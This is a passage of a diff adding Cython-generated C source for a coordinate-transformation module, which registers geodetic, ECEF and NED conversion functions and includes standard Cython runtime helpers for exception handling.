__PYX_ERR(0, 82, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":87 + * return [e(0), e(1), e(2)] + * + * def rot_matrix(roll, pitch, yaw): # <<<<<<<<<<<<<< + * return matrix2numpy(rot_matrix_c(roll, pitch, yaw)) + * + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_13rot_matrix, 0, __pyx_n_s_rot_matrix, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__17)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 87, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_rot_matrix, __pyx_t_2) < 0) __PYX_ERR(0, 87, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":90 + * return matrix2numpy(rot_matrix_c(roll, pitch, yaw)) + * + * def ecef_euler_from_ned_single(ecef_init, ned_pose): # <<<<<<<<<<<<<< + * cdef ECEF init = list2ecef(ecef_init) + * cdef Vector3 pose = Vector3(ned_pose[0], ned_pose[1], ned_pose[2]) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_15ecef_euler_from_ned_single, 0, __pyx_n_s_ecef_euler_from_ned_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__19)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_ecef_euler_from_ned_single, __pyx_t_2) < 0) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":97 + * return [e(0), e(1), e(2)] + * + * def ned_euler_from_ecef_single(ecef_init, ecef_pose): # <<<<<<<<<<<<<< + * cdef ECEF init = list2ecef(ecef_init) + * cdef Vector3 pose = Vector3(ecef_pose[0], ecef_pose[1], ecef_pose[2]) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_17ned_euler_from_ecef_single, 0, __pyx_n_s_ned_euler_from_ecef_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__21)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 97, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_ned_euler_from_ecef_single, __pyx_t_2) < 0) __PYX_ERR(0, 97, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":104 + * return [e(0), e(1), e(2)] + * + * def geodetic2ecef_single(geodetic): # <<<<<<<<<<<<<< + * cdef Geodetic g = list2geodetic(geodetic) + * cdef ECEF e = geodetic2ecef_c(g) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_19geodetic2ecef_single, 0, __pyx_n_s_geodetic2ecef_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__23)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 104, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_geodetic2ecef_single, __pyx_t_2) < 0) __PYX_ERR(0, 104, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":109 + * return [e.x, e.y, e.z] + * + * def ecef2geodetic_single(ecef): # <<<<<<<<<<<<<< + * cdef ECEF e = list2ecef(ecef) + * cdef Geodetic g = ecef2geodetic_c(e) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_21ecef2geodetic_single, 0, __pyx_n_s_ecef2geodetic_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__25)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_ecef2geodetic_single, __pyx_t_2) < 0) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":141 + * return self.ned2ecef_matrix + * + * @classmethod # <<<<<<<<<<<<<< + * def from_geodetic(cls, geodetic): + * return cls(geodetic=geodetic) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_10LocalCoord_3from_geodetic, __Pyx_CYFUNCTION_CLASSMETHOD | __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_LocalCoord_from_geodetic, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__27)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 141, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_15transformations_15transformations_LocalCoord->tp_dict, __pyx_n_s_from_geodetic, __pyx_t_2) < 0) __PYX_ERR(0, 141, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + PyType_Modified(__pyx_ptype_6common_15transformations_15transformations_LocalCoord); + __Pyx_GetNameInClass(__pyx_t_2, (PyObject *)__pyx_ptype_6common_15transformations_15transformations_LocalCoord, __pyx_n_s_from_geodetic); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 141, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_Method_ClassMethod(__pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 141, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_15transformations_15transformations_LocalCoord->tp_dict, __pyx_n_s_from_geodetic, __pyx_t_3) < 0) __PYX_ERR(0, 141, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6common_15transformations_15transformations_LocalCoord); + + /* "common/transformations/transformations.pyx":145 + * return cls(geodetic=geodetic) + * + * @classmethod # <<<<<<<<<<<<<< + * def from_ecef(cls, ecef): + * return cls(ecef=ecef) + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_10LocalCoord_5from_ecef, __Pyx_CYFUNCTION_CLASSMETHOD | __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_LocalCoord_from_ecef, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__29)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 145, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_15transformations_15transformations_LocalCoord->tp_dict, __pyx_n_s_from_ecef, __pyx_t_3) < 0) __PYX_ERR(0, 145, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6common_15transformations_15transformations_LocalCoord); + __Pyx_GetNameInClass(__pyx_t_3, (PyObject *)__pyx_ptype_6common_15transformations_15transformations_LocalCoord, __pyx_n_s_from_ecef); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 145, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_2 = __Pyx_Method_ClassMethod(__pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 145, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_15transformations_15transformations_LocalCoord->tp_dict, __pyx_n_s_from_ecef, __pyx_t_2) < 0) __PYX_ERR(0, 145, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + PyType_Modified(__pyx_ptype_6common_15transformations_15transformations_LocalCoord); + + /* "common/transformations/transformations.pyx":149 + * return cls(ecef=ecef) + * + * def ecef2ned_single(self, ecef): # <<<<<<<<<<<<<< + * assert self.lc + * cdef ECEF e = list2ecef(ecef) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_10LocalCoord_7ecef2ned_single, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_LocalCoord_ecef2ned_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__31)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_15transformations_15transformations_LocalCoord->tp_dict, __pyx_n_s_ecef2ned_single, __pyx_t_2) < 0) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + PyType_Modified(__pyx_ptype_6common_15transformations_15transformations_LocalCoord); + + /* "common/transformations/transformations.pyx":155 + * return [n.n, n.e, n.d] + * + * def ned2ecef_single(self, ned): # <<<<<<<<<<<<<< + * assert self.lc + * cdef NED n = list2ned(ned) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_10LocalCoord_9ned2ecef_single, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_LocalCoord_ned2ecef_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__33)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 155, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_15transformations_15transformations_LocalCoord->tp_dict, __pyx_n_s_ned2ecef_single, __pyx_t_2) < 0) __PYX_ERR(0, 155, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + PyType_Modified(__pyx_ptype_6common_15transformations_15transformations_LocalCoord); + + /* "common/transformations/transformations.pyx":161 + * return [e.x, e.y, e.z] + * + * def geodetic2ned_single(self, geodetic): # <<<<<<<<<<<<<< + * assert self.lc + * cdef Geodetic g = list2geodetic(geodetic) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_10LocalCoord_11geodetic2ned_single, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_LocalCoord_geodetic2ned_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__35)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_15transformations_15transformations_LocalCoord->tp_dict, __pyx_n_s_geodetic2ned_single, __pyx_t_2) < 0) __PYX_ERR(0, 161, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + PyType_Modified(__pyx_ptype_6common_15transformations_15transformations_LocalCoord); + + /* "common/transformations/transformations.pyx":167 + * return [n.n, n.e, n.d] + * + * def ned2geodetic_single(self, ned): # <<<<<<<<<<<<<< + * assert self.lc + * cdef NED n = list2ned(ned) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_10LocalCoord_13ned2geodetic_single, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_LocalCoord_ned2geodetic_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__37)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 167, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_15transformations_15transformations_LocalCoord->tp_dict, __pyx_n_s_ned2geodetic_single, __pyx_t_2) < 0) __PYX_ERR(0, 167, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + PyType_Modified(__pyx_ptype_6common_15transformations_15transformations_LocalCoord); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_10LocalCoord_17__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_LocalCoord___reduce_cython, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__39)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_2) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_10LocalCoord_19__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_LocalCoord___setstate_cython, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__41)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_2) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":1 + * # distutils: language = c++ # <<<<<<<<<<<<<< + * # cython: language_level = 3 + * from common.transformations.transformations cimport Matrix3, Vector3, Quaternion + */ + __pyx_t_2 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /*--- Wrapped vars code ---*/ + + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + if (__pyx_m) { + if (__pyx_d && stringtab_initialized) { + __Pyx_AddTraceback("init common.transformations.transformations", __pyx_clineno, __pyx_lineno, __pyx_filename); + } + #if !CYTHON_USE_MODULE_STATE + Py_CLEAR(__pyx_m); + #else + Py_DECREF(__pyx_m); + if (pystate_addmodule_run) { + PyObject *tp, *value, *tb; + PyErr_Fetch(&tp, &value, &tb); + PyState_RemoveModule(&__pyx_moduledef); + PyErr_Restore(tp, value, tb); + } + #endif + } else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_ImportError, "init common.transformations.transformations"); + } + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + #if CYTHON_PEP489_MULTI_PHASE_INIT + return (__pyx_m != NULL) ? 0 : -1; + #elif PY_MAJOR_VERSION >= 3 + return __pyx_m; + #else + return; + #endif +} +/* #### Code section: cleanup_globals ### */ +/* #### Code section: cleanup_module ### */ +/* #### Code section: main_method ### */ +/* #### Code section: utility_code_pragmas ### */ +#ifdef _MSC_VER +#pragma warning( push ) +/* Warning 4127: conditional expression is constant + * Cython uses constant conditional expressions to allow in inline functions to be optimized at + * compile-time, so this warning is not useful + */ +#pragma warning( disable : 4127 ) +#endif + + + +/* #### Code section: utility_code_def ### */ + +/* --- Runtime support code --- */ +/* Refnanny */ +#if CYTHON_REFNANNY +static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { + PyObject *m = NULL, *p = NULL; + void *r = NULL; + m = PyImport_ImportModule(modname); + if (!m) goto end; + p = PyObject_GetAttrString(m, "RefNannyAPI"); + if (!p) goto end; + r = PyLong_AsVoidPtr(p); +end: + Py_XDECREF(p); + Py_XDECREF(m); + return (__Pyx_RefNannyAPIStruct *)r; +} +#endif + +/* PyErrExceptionMatches */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i= 0x030C00A6 + PyObject *current_exception = tstate->current_exception; + if (unlikely(!current_exception)) return 0; + exc_type = (PyObject*) Py_TYPE(current_exception); + if (exc_type == err) return 1; +#else + exc_type = tstate->curexc_type; + if (exc_type == err) return 1; + if (unlikely(!exc_type)) return 0; +#endif + #if CYTHON_AVOID_BORROWED_REFS + Py_INCREF(exc_type); + #endif + if (unlikely(PyTuple_Check(err))) { + result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); + } else { + result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); + } + #if CYTHON_AVOID_BORROWED_REFS + Py_DECREF(exc_type); + #endif + return result; +} +#endif + +/* PyErrFetchRestore */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject *tmp_value; + assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); + if (value) { + #if CYTHON_COMPILING_IN_CPYTHON + if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) + #endif + PyException_SetTraceback(value, tb); + } + tmp_value = tstate->current_exception; + tstate->current_exception = value; + Py_XDECREF(tmp_value); +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + tmp_type = tstate->curexc_type; + tmp_value = tstate->curexc_value; + tmp_tb = tstate->curexc_traceback; + tstate->curexc_type = type; + tstate->curexc_value = value; + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#endif +} +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject* exc_value; + exc_value = tstate->current_exception; + tstate->current_exception = 0; + *value = exc_value; + *type = NULL; + *tb = NULL; + if (exc_value) { + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + #if CYTHON_COMPILING_IN_CPYTHON + *tb = ((PyBaseExceptionObject*) exc_value)->traceback; + Py_XINCREF(*tb); + #else + *tb = PyException_GetTraceback(exc_value); + #endif + } +#else + *type = tstate->curexc_type; + *value = tstate->curexc_value; + *tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; +#endif +} +#endif + +/* PyObjectGetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro)) + return tp->tp_getattro(obj, attr_name); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_getattr)) + return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); +#endif + return PyObject_GetAttr(obj, attr_name); +} +#endif + +/* PyObjectGetAttrStrNoError */ +static void __Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + __Pyx_PyErr_Clear(); +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { + PyObject *result; +#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { + return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); + } +#endif + result = __Pyx_PyObject_GetAttrStr(obj, attr_name); + if (unlikely(!result)) { + __Pyx_PyObject_GetAttrStr_ClearAttributeError(); + } + return result; +} + +/* GetBuiltinName */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name) { + PyObject* result = __Pyx_PyObject_GetAttrStrNoError(__pyx_b, name); + if (unlikely(!result) && !PyErr_Occurred()) { + PyErr_Format(PyExc_NameError, +#if PY_MAJOR_VERSION >= 3 + "name '%U' is not defined", name); +#else + "name '%.200s' is not defined", PyString_AS_STRING(name)); +#endif + } + return result; +} + +/* GetTopmostException */ +#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE +static _PyErr_StackItem * +__Pyx_PyErr_GetTopmostException(PyThreadState *tstate) +{ + _PyErr_StackItem *exc_info = tstate->exc_info; + while ((exc_info->exc_value == NULL || exc_info->exc_value == Py_None) && + exc_info->previous_item != NULL) + { + exc_info = exc_info->previous_item; + } + return exc_info; +} +#endif + +/* SaveResetException */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); + PyObject *exc_value = exc_info->exc_value; + if (exc_value == NULL || exc_value == Py_None) { + *value = NULL; + *type = NULL; + *tb = NULL; + } else { + *value = exc_value; + Py_INCREF(*value); + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + *tb = PyException_GetTraceback(exc_value); + } + #elif CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); + *type = exc_info->exc_type; + *value = exc_info->exc_value; + *tb = exc_info->exc_traceback; + Py_XINCREF(*type); + Py_XINCREF(*value); + Py_XINCREF(*tb); + #else + *type = tstate->exc_type; + *value = tstate->exc_value; + *tb = tstate->exc_traceback; + Py_XINCREF(*type); + Py_XINCREF(*value); + Py_XINCREF(*tb); + #endif +} +static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = tstate->exc_info; + PyObject *tmp_value = exc_info->exc_value; + exc_info->exc_value = value; + Py_XDECREF(tmp_value); + Py_XDECREF(type); + Py_XDECREF(tb); + #else + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = type; + exc_info->exc_value = value; + exc_info->exc_traceback = tb; + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = type; + tstate->exc_value = value; + tstate->exc_traceback = tb; + #endif + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); + #endif +} +#endif + +/* GetException */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) +#else +static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb) +#endif +{ + PyObject *local_type = NULL, *local_value, *local_tb = NULL; +#if CYTHON_FAST_THREAD_STATE + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if PY_VERSION_HEX >= 0x030C00A6 + local_value = tstate->current_exception; + tstate->current_exception = 0; + if (likely(local_value)) { + local_type = (PyObject*) Py_TYPE(local_value); + Py_INCREF(local_type); + local_tb = PyException_GetTraceback(local_value); + } + #else + local_type = tstate->curexc_type; + local_value = tstate->curexc_value; + local_tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; + #endif +#else + PyErr_Fetch(&local_type, &local_value, &local_tb); +#endif + PyErr_NormalizeException(&local_type, &local_value, &local_tb); +#if CYTHON_FAST_THREAD_STATE && PY_VERSION_HEX >= 0x030C00A6 + if (unlikely(tstate->current_exception)) +#elif CYTHON_FAST_THREAD_STATE + if (unlikely(tstate->curexc_type)) +#else + if (unlikely(PyErr_Occurred())) +#endif + goto bad; + #if PY_MAJOR_VERSION >= 3 + if (local_tb) { + if (unlikely(PyException_SetTraceback(local_value, local_tb) < 0)) + goto bad; + } + #endif + Py_XINCREF(local_tb); + Py_XINCREF(local_type); + Py_XINCREF(local_value); + *type = local_type; + *value = local_value; + *tb = local_tb; +#if CYTHON_FAST_THREAD_STATE + #if CYTHON_USE_EXC_INFO_STACK + { + _PyErr_StackItem *exc_info = tstate->exc_info; + #if PY_VERSION_HEX >= 0x030B00a4 + tmp_value = exc_info->exc_value; + exc_info->exc_value = local_value; + tmp_type = NULL; + tmp_tb = NULL; + Py_XDECREF(local_type); + Py_XDECREF(local_tb); + #else + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = local_type; + exc_info->exc_value = local_value; + exc_info->exc_traceback = local_tb; + #endif + } + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = local_type; + tstate->exc_value = local_value; + tstate->exc_traceback = local_tb; + #endif + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#else + PyErr_SetExcInfo(local_type, local_value, local_tb); +#endif + return 0; +bad: + *type = 0; + *value = 0; + *tb = 0; + Py_XDECREF(local_type); + Py_XDECREF(local_value); + Py_XDECREF(local_tb); + return -1; +} + +/* PyObjectCall */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw) { + PyObject *result; + ternaryfunc call = Py_TYPE(func)->tp_call; + if (unlikely(!call)) + return PyObject_Call(func, arg, kw); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = (*call)(func, arg, kw); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* RaiseException */ +#if PY_MAJOR_VERSION < 3 +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + __Pyx_PyThreadState_declare + CYTHON_UNUSED_VAR(cause); + Py_XINCREF(type); + if (!value || value == Py_None) + value = NULL; + else + Py_INCREF(value); + if (!tb || tb == Py_None) + tb = NULL; + else { + Py_INCREF(tb); + if (!PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto raise_error; + } + } + if (PyType_Check(type)) { +#if CYTHON_COMPILING_IN_PYPY + if (!value) { + Py_INCREF(Py_None); + value = Py_None; + } +#endif + PyErr_NormalizeException(&type, &value, &tb); + } else { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto raise_error; + } + value = type; + type = (PyObject*) Py_TYPE(type); + Py_INCREF(type); + if (!PyType_IsSubtype((PyTypeObject *)type, (PyTypeObject *)PyExc_BaseException)) { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto raise_error; + } + } + __Pyx_PyThreadState_assign + __Pyx_ErrRestore(type, value, tb); + return; +raise_error: + Py_XDECREF(value); + Py_XDECREF(type); + Py_XDECREF(tb); + return; +} +#else +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + PyObject* owned_instance = NULL; + if (tb == Py_None) { + tb = 0; + } else if (tb && !PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto bad; + } + if (value == Py_None) + value = 0; + if (PyExceptionInstance_Check(type)) { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto bad; + } + value = type; + type = (PyObject*) Py_TYPE(value); + } else if (PyExceptionClass_Check(type)) { + PyObject *instance_class = NULL; + if (value && PyExceptionInstance_Check(value)) { + instance_class = (PyObject*) Py_TYPE(value); + if (instance_class != type) { + int is_subclass = PyObject_IsSubclass(instance_class, type); + if (!is_subclass) { + instance_class = NULL; + } else if (unlikely(is_subclass == -1)) { + goto bad; + } else { + type = instance_class; + } + } + } + if (!instance_class) { + PyObject *args; + if (!value) + args = PyTuple_New(0); + else if (PyTuple_Check(value)) { + Py_INCREF(value); + args = value; + } else + args = PyTuple_Pack(1, value); + if (!args) + goto bad; + owned_instance = PyObject_Call(type, args, NULL); + Py_DECREF(args); + if (!owned_instance) + goto bad; + value = owned_instance; + if (!PyExceptionInstance_Check(value)) { + PyErr_Format(PyExc_TypeError, + "calling %R should have returned an instance of " + "BaseException, not %R", + type, 